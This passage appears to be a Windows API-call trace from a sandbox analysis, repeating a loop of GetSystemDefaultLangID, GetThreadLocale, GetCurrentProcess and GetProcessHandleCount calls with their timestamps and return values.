[0163.823] GetSystemDefaultLangID () returned 0x2630409 [0163.823] GetThreadLocale () returned 0x409 [0163.823] GetCurrentProcess () returned 0xffffffff [0163.823] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.823] GetSystemDefaultLangID () returned 0x2630409 [0163.823] GetThreadLocale () returned 0x409 [0163.823] GetCurrentProcess () returned 0xffffffff [0163.823] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.823] GetSystemDefaultLangID () returned 0x2630409 [0163.823] GetThreadLocale () returned 0x409 [0163.823] GetCurrentProcess () returned 0xffffffff [0163.823] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.823] GetSystemDefaultLangID () returned 0x2630409 [0163.823] GetThreadLocale () returned 0x409 [0163.823] GetCurrentProcess () returned 0xffffffff [0163.823] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.823] GetSystemDefaultLangID () returned 0x2630409 [0163.823] GetThreadLocale () returned 0x409 [0163.823] GetCurrentProcess () returned 0xffffffff [0163.823] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.823] GetSystemDefaultLangID () returned 0x2630409 [0163.823] GetThreadLocale () returned 0x409 [0163.823] GetCurrentProcess () returned 0xffffffff [0163.823] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.824] GetSystemDefaultLangID () returned 0x2630409 [0163.824] GetThreadLocale () returned 0x409 [0163.824] GetCurrentProcess () returned 0xffffffff [0163.824] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.824] GetSystemDefaultLangID () returned 0x2630409 [0163.824] GetThreadLocale () returned 0x409 [0163.824] GetCurrentProcess () returned 0xffffffff [0163.824] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.824] GetSystemDefaultLangID () returned 0x2630409 [0163.824] GetThreadLocale () returned 0x409 [0163.824] GetCurrentProcess () returned 0xffffffff [0163.824] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.824] GetSystemDefaultLangID () returned 0x2630409 [0163.824] GetThreadLocale () returned 0x409 [0163.824] GetCurrentProcess () returned 0xffffffff [0163.824] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.824] GetSystemDefaultLangID () returned 0x2630409 [0163.824] GetThreadLocale () returned 0x409 [0163.824] GetCurrentProcess () returned 0xffffffff [0163.824] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.826] GetSystemDefaultLangID () returned 0x2630409 [0163.826] GetThreadLocale () returned 0x409 [0163.826] GetCurrentProcess () returned 0xffffffff [0163.826] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.826] GetSystemDefaultLangID () returned 0x2630409 [0163.826] GetThreadLocale () returned 0x409 [0163.826] GetCurrentProcess () returned 0xffffffff [0163.826] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.826] GetSystemDefaultLangID () returned 0x2630409 [0163.826] GetThreadLocale () returned 0x409 [0163.826] GetCurrentProcess () returned 0xffffffff [0163.827] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.827] GetSystemDefaultLangID () returned 0x2630409 [0163.827] GetThreadLocale () returned 0x409 [0163.827] GetCurrentProcess () returned 0xffffffff [0163.827] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.827] GetSystemDefaultLangID () returned 0x2630409 [0163.827] GetThreadLocale () returned 0x409 [0163.827] GetCurrentProcess () returned 0xffffffff [0163.827] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.827] GetSystemDefaultLangID () returned 0x2630409 [0163.827] GetThreadLocale () returned 0x409 [0163.827] GetCurrentProcess () returned 0xffffffff [0163.827] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.827] GetSystemDefaultLangID () returned 0x2630409 [0163.827] GetThreadLocale () returned 0x409 [0163.827] GetCurrentProcess () returned 0xffffffff [0163.827] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.827] GetSystemDefaultLangID () returned 0x2630409 [0163.827] GetThreadLocale () returned 0x409 [0163.827] GetCurrentProcess () returned 0xffffffff [0163.827] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.827] GetSystemDefaultLangID () returned 0x2630409 [0163.827] GetThreadLocale () returned 0x409 [0163.827] GetCurrentProcess () returned 0xffffffff [0163.827] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.827] GetSystemDefaultLangID () returned 0x2630409 [0163.827] GetThreadLocale () returned 0x409 [0163.828] GetCurrentProcess () returned 0xffffffff [0163.828] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.828] GetSystemDefaultLangID () returned 0x2630409 [0163.828] GetThreadLocale () returned 0x409 [0163.828] GetCurrentProcess () returned 0xffffffff [0163.828] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.828] GetSystemDefaultLangID () returned 0x2630409 [0163.828] GetThreadLocale () returned 0x409 [0163.828] GetCurrentProcess () returned 0xffffffff [0163.828] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.828] GetSystemDefaultLangID () returned 0x2630409 [0163.828] GetThreadLocale () returned 0x409 [0163.828] GetCurrentProcess () returned 0xffffffff [0163.828] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.828] GetSystemDefaultLangID () returned 0x2630409 [0163.828] GetThreadLocale () returned 0x409 [0163.828] GetCurrentProcess () returned 0xffffffff [0163.828] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.828] GetSystemDefaultLangID () returned 0x2630409 [0163.828] GetThreadLocale () returned 0x409 [0163.828] GetCurrentProcess () returned 0xffffffff [0163.828] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.828] GetSystemDefaultLangID () returned 0x2630409 [0163.828] GetThreadLocale () returned 0x409 [0163.828] GetCurrentProcess () returned 0xffffffff [0163.828] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.828] GetSystemDefaultLangID () returned 0x2630409 [0163.829] GetThreadLocale () returned 0x409 [0163.829] GetCurrentProcess () returned 0xffffffff [0163.829] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.829] GetSystemDefaultLangID () returned 0x2630409 [0163.829] GetThreadLocale () returned 0x409 [0163.829] GetCurrentProcess () returned 0xffffffff [0163.829] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.829] GetSystemDefaultLangID () returned 0x2630409 [0163.829] GetThreadLocale () returned 0x409 [0163.829] GetCurrentProcess () returned 0xffffffff [0163.829] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.829] GetSystemDefaultLangID () returned 0x2630409 [0163.829] GetThreadLocale () returned 0x409 [0163.829] GetCurrentProcess () returned 0xffffffff [0163.829] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.829] GetSystemDefaultLangID () returned 0x2630409 [0163.829] GetThreadLocale () returned 0x409 [0163.829] GetCurrentProcess () returned 0xffffffff [0163.829] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.829] GetSystemDefaultLangID () returned 0x2630409 [0163.829] GetThreadLocale () returned 0x409 [0163.829] GetCurrentProcess () returned 0xffffffff [0163.829] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.829] GetSystemDefaultLangID () returned 0x2630409 [0163.829] GetThreadLocale () returned 0x409 [0163.829] GetCurrentProcess () returned 0xffffffff [0163.829] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.830] GetSystemDefaultLangID () returned 0x2630409 [0163.830] GetThreadLocale () returned 0x409 [0163.830] GetCurrentProcess () returned 0xffffffff [0163.830] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.830] GetSystemDefaultLangID () returned 0x2630409 [0163.830] GetThreadLocale () returned 0x409 [0163.830] GetCurrentProcess () returned 0xffffffff [0163.830] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.830] GetSystemDefaultLangID () returned 0x2630409 [0163.830] GetThreadLocale () returned 0x409 [0163.830] GetCurrentProcess () returned 0xffffffff [0163.830] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.830] GetSystemDefaultLangID () returned 0x2630409 [0163.830] GetThreadLocale () returned 0x409 [0163.830] GetCurrentProcess () returned 0xffffffff [0163.830] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.830] GetSystemDefaultLangID () returned 0x2630409 [0163.830] GetThreadLocale () returned 0x409 [0163.830] GetCurrentProcess () returned 0xffffffff [0163.830] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.830] GetSystemDefaultLangID () returned 0x2630409 [0163.830] GetThreadLocale () returned 0x409 [0163.830] GetCurrentProcess () returned 0xffffffff [0163.830] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.830] GetSystemDefaultLangID () returned 0x2630409 [0163.830] GetThreadLocale () returned 0x409 [0163.831] GetCurrentProcess () returned 0xffffffff [0163.831] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.831] GetSystemDefaultLangID () returned 0x2630409 [0163.831] GetThreadLocale () returned 0x409 [0163.831] GetCurrentProcess () returned 0xffffffff [0163.831] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.831] GetSystemDefaultLangID () returned 0x2630409 [0163.831] GetThreadLocale () returned 0x409 [0163.831] GetCurrentProcess () returned 0xffffffff [0163.831] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.831] GetSystemDefaultLangID () returned 0x2630409 [0163.831] GetThreadLocale () returned 0x409 [0163.831] GetCurrentProcess () returned 0xffffffff [0163.831] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.831] GetSystemDefaultLangID () returned 0x2630409 [0163.831] GetThreadLocale () returned 0x409 [0163.831] GetCurrentProcess () returned 0xffffffff [0163.831] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.831] GetSystemDefaultLangID () returned 0x2630409 [0163.831] GetThreadLocale () returned 0x409 [0163.831] GetCurrentProcess () returned 0xffffffff [0163.831] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.831] GetSystemDefaultLangID () returned 0x2630409 [0163.831] GetThreadLocale () returned 0x409 [0163.831] GetCurrentProcess () returned 0xffffffff [0163.831] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.831] GetSystemDefaultLangID () returned 0x2630409 [0163.832] GetThreadLocale () returned 0x409 [0163.832] GetCurrentProcess () returned 0xffffffff [0163.832] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.832] GetSystemDefaultLangID () returned 0x2630409 [0163.832] GetThreadLocale () returned 0x409 [0163.832] GetCurrentProcess () returned 0xffffffff [0163.832] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.832] GetSystemDefaultLangID () returned 0x2630409 [0163.832] GetThreadLocale () returned 0x409 [0163.832] GetCurrentProcess () returned 0xffffffff [0163.832] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.832] GetSystemDefaultLangID () returned 0x2630409 [0163.832] GetThreadLocale () returned 0x409 [0163.832] GetCurrentProcess () returned 0xffffffff [0163.832] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.832] GetSystemDefaultLangID () returned 0x2630409 [0163.832] GetThreadLocale () returned 0x409 [0163.832] GetCurrentProcess () returned 0xffffffff [0163.832] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.832] GetSystemDefaultLangID () returned 0x2630409 [0163.832] GetThreadLocale () returned 0x409 [0163.832] GetCurrentProcess () returned 0xffffffff [0163.832] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.832] GetSystemDefaultLangID () returned 0x2630409 [0163.832] GetThreadLocale () returned 0x409 [0163.832] GetCurrentProcess () returned 0xffffffff [0163.832] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.833] GetSystemDefaultLangID () returned 0x2630409 [0163.833] GetThreadLocale () returned 0x409 [0163.833] GetCurrentProcess () returned 0xffffffff [0163.833] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.833] GetSystemDefaultLangID () returned 0x2630409 [0163.833] GetThreadLocale () returned 0x409 [0163.833] GetCurrentProcess () returned 0xffffffff [0163.833] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.833] GetSystemDefaultLangID () returned 0x2630409 [0163.833] GetThreadLocale () returned 0x409 [0163.833] GetCurrentProcess () returned 0xffffffff [0163.833] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.833] GetSystemDefaultLangID () returned 0x2630409 [0163.833] GetThreadLocale () returned 0x409 [0163.833] GetCurrentProcess () returned 0xffffffff [0163.833] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.833] GetSystemDefaultLangID () returned 0x2630409 [0163.833] GetThreadLocale () returned 0x409 [0163.833] GetCurrentProcess () returned 0xffffffff [0163.833] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.833] GetSystemDefaultLangID () returned 0x2630409 [0163.833] GetThreadLocale () returned 0x409 [0163.833] GetCurrentProcess () returned 0xffffffff [0163.833] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.833] GetSystemDefaultLangID () returned 0x2630409 [0163.833] GetThreadLocale () returned 0x409 [0163.833] GetCurrentProcess () returned 0xffffffff [0163.833] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.834] GetSystemDefaultLangID () returned 0x2630409 [0163.834] GetThreadLocale () returned 0x409 [0163.834] GetCurrentProcess () returned 0xffffffff [0163.834] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.834] GetSystemDefaultLangID () returned 0x2630409 [0163.834] GetThreadLocale () returned 0x409 [0163.834] GetCurrentProcess () returned 0xffffffff [0163.834] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.834] GetSystemDefaultLangID () returned 0x2630409 [0163.834] GetThreadLocale () returned 0x409 [0163.834] GetCurrentProcess () returned 0xffffffff [0163.834] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.834] GetSystemDefaultLangID () returned 0x2630409 [0163.834] GetThreadLocale () returned 0x409 [0163.834] GetCurrentProcess () returned 0xffffffff [0163.834] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.834] GetSystemDefaultLangID () returned 0x2630409 [0163.834] GetThreadLocale () returned 0x409 [0163.834] GetCurrentProcess () returned 0xffffffff [0163.834] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.834] GetSystemDefaultLangID () returned 0x2630409 [0163.834] GetThreadLocale () returned 0x409 [0163.834] GetCurrentProcess () returned 0xffffffff [0163.834] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.834] GetSystemDefaultLangID () returned 0x2630409 [0163.834] GetThreadLocale () returned 0x409 [0163.834] GetCurrentProcess () returned 0xffffffff [0163.835] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.835] GetSystemDefaultLangID () returned 0x2630409 [0163.835] GetThreadLocale () returned 0x409 [0163.835] GetCurrentProcess () returned 0xffffffff [0163.835] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.835] GetSystemDefaultLangID () returned 0x2630409 [0163.835] GetThreadLocale () returned 0x409 [0163.835] GetCurrentProcess () returned 0xffffffff [0163.835] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.835] GetSystemDefaultLangID () returned 0x2630409 [0163.835] GetThreadLocale () returned 0x409 [0163.835] GetCurrentProcess () returned 0xffffffff [0163.835] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.835] GetSystemDefaultLangID () returned 0x2630409 [0163.835] GetThreadLocale () returned 0x409 [0163.835] GetCurrentProcess () returned 0xffffffff [0163.835] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.835] GetSystemDefaultLangID () returned 0x2630409 [0163.835] GetThreadLocale () returned 0x409 [0163.835] GetCurrentProcess () returned 0xffffffff [0163.835] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.835] GetSystemDefaultLangID () returned 0x2630409 [0163.835] GetThreadLocale () returned 0x409 [0163.835] GetCurrentProcess () returned 0xffffffff [0163.835] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.835] GetSystemDefaultLangID () returned 0x2630409 [0163.836] GetThreadLocale () returned 0x409 [0163.836] GetCurrentProcess () returned 0xffffffff [0163.836] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.836] GetSystemDefaultLangID () returned 0x2630409 [0163.836] GetThreadLocale () returned 0x409 [0163.836] GetCurrentProcess () returned 0xffffffff [0163.836] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.836] GetSystemDefaultLangID () returned 0x2630409 [0163.836] GetThreadLocale () returned 0x409 [0163.836] GetCurrentProcess () returned 0xffffffff [0163.836] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.836] GetSystemDefaultLangID () returned 0x2630409 [0163.836] GetThreadLocale () returned 0x409 [0163.836] GetCurrentProcess () returned 0xffffffff [0163.836] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.836] GetSystemDefaultLangID () returned 0x2630409 [0163.836] GetThreadLocale () returned 0x409 [0163.836] GetCurrentProcess () returned 0xffffffff [0163.836] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.836] GetSystemDefaultLangID () returned 0x2630409 [0163.836] GetThreadLocale () returned 0x409 [0163.836] GetCurrentProcess () returned 0xffffffff [0163.836] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.836] GetSystemDefaultLangID () returned 0x2630409 [0163.836] GetThreadLocale () returned 0x409 [0163.836] GetCurrentProcess () returned 0xffffffff [0163.836] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.837] GetSystemDefaultLangID () returned 0x2630409 [0163.837] GetThreadLocale () returned 0x409 [0163.837] GetCurrentProcess () returned 0xffffffff [0163.837] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.837] GetSystemDefaultLangID () returned 0x2630409 [0163.837] GetThreadLocale () returned 0x409 [0163.837] GetCurrentProcess () returned 0xffffffff [0163.837] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.837] GetSystemDefaultLangID () returned 0x2630409 [0163.837] GetThreadLocale () returned 0x409 [0163.837] GetCurrentProcess () returned 0xffffffff [0163.837] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.837] GetSystemDefaultLangID () returned 0x2630409 [0163.837] GetThreadLocale () returned 0x409 [0163.837] GetCurrentProcess () returned 0xffffffff [0163.837] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.837] GetSystemDefaultLangID () returned 0x2630409 [0163.837] GetThreadLocale () returned 0x409 [0163.837] GetCurrentProcess () returned 0xffffffff [0163.837] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.837] GetSystemDefaultLangID () returned 0x2630409 [0163.837] GetThreadLocale () returned 0x409 [0163.837] GetCurrentProcess () returned 0xffffffff [0163.837] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.837] GetSystemDefaultLangID () returned 0x2630409 [0163.837] GetThreadLocale () returned 0x409 [0163.837] GetCurrentProcess () returned 0xffffffff [0163.837] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.838] GetSystemDefaultLangID () returned 0x2630409 [0163.838] GetThreadLocale () returned 0x409 [0163.838] GetCurrentProcess () returned 0xffffffff [0163.838] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.838] GetSystemDefaultLangID () returned 0x2630409 [0163.838] GetThreadLocale () returned 0x409 [0163.838] GetCurrentProcess () returned 0xffffffff [0163.838] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.838] GetSystemDefaultLangID () returned 0x2630409 [0163.838] GetThreadLocale () returned 0x409 [0163.838] GetCurrentProcess () returned 0xffffffff [0163.838] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.838] GetSystemDefaultLangID () returned 0x2630409 [0163.838] GetThreadLocale () returned 0x409 [0163.838] GetCurrentProcess () returned 0xffffffff [0163.838] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.838] GetSystemDefaultLangID () returned 0x2630409 [0163.838] GetThreadLocale () returned 0x409 [0163.838] GetCurrentProcess () returned 0xffffffff [0163.838] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.838] GetSystemDefaultLangID () returned 0x2630409 [0163.838] GetThreadLocale () returned 0x409 [0163.838] GetCurrentProcess () returned 0xffffffff [0163.838] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.838] GetSystemDefaultLangID () returned 0x2630409 [0163.838] GetThreadLocale () returned 0x409 [0163.839] GetCurrentProcess () returned 0xffffffff [0163.839] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.839] GetSystemDefaultLangID () returned 0x2630409 [0163.839] GetThreadLocale () returned 0x409 [0163.839] GetCurrentProcess () returned 0xffffffff [0163.839] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.839] GetSystemDefaultLangID () returned 0x2630409 [0163.839] GetThreadLocale () returned 0x409 [0163.839] GetCurrentProcess () returned 0xffffffff [0163.839] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.839] GetSystemDefaultLangID () returned 0x2630409 [0163.839] GetThreadLocale () returned 0x409 [0163.839] GetCurrentProcess () returned 0xffffffff [0163.839] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.839] GetSystemDefaultLangID () returned 0x2630409 [0163.839] GetThreadLocale () returned 0x409 [0163.839] GetCurrentProcess () returned 0xffffffff [0163.839] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.839] GetSystemDefaultLangID () returned 0x2630409 [0163.839] GetThreadLocale () returned 0x409 [0163.839] GetCurrentProcess () returned 0xffffffff [0163.839] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.839] GetSystemDefaultLangID () returned 0x2630409 [0163.839] GetThreadLocale () returned 0x409 [0163.839] GetCurrentProcess () returned 0xffffffff [0163.839] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.840] GetSystemDefaultLangID () returned 0x2630409 [0163.840] GetThreadLocale () returned 0x409 [0163.840] GetCurrentProcess () returned 0xffffffff [0163.840] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.840] GetSystemDefaultLangID () returned 0x2630409 [0163.840] GetThreadLocale () returned 0x409 [0163.840] GetCurrentProcess () returned 0xffffffff [0163.840] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.840] GetSystemDefaultLangID () returned 0x2630409 [0163.840] GetThreadLocale () returned 0x409 [0163.840] GetCurrentProcess () returned 0xffffffff [0163.976] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.976] GetSystemDefaultLangID () returned 0x2630409 [0163.976] GetThreadLocale () returned 0x409 [0163.976] GetCurrentProcess () returned 0xffffffff [0163.976] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.976] GetSystemDefaultLangID () returned 0x2630409 [0163.976] GetThreadLocale () returned 0x409 [0163.976] GetCurrentProcess () returned 0xffffffff [0163.976] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.976] GetSystemDefaultLangID () returned 0x2630409 [0163.976] GetThreadLocale () returned 0x409 [0163.976] GetCurrentProcess () returned 0xffffffff [0163.976] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.976] GetSystemDefaultLangID () returned 0x2630409 [0163.976] GetThreadLocale () returned 0x409 [0163.976] GetCurrentProcess () returned 0xffffffff [0163.976] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.977] GetSystemDefaultLangID () returned 0x2630409 [0163.977] GetThreadLocale () returned 0x409 [0163.977] GetCurrentProcess () returned 0xffffffff [0163.977] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.977] GetSystemDefaultLangID () returned 0x2630409 [0163.977] GetThreadLocale () returned 0x409 [0163.977] GetCurrentProcess 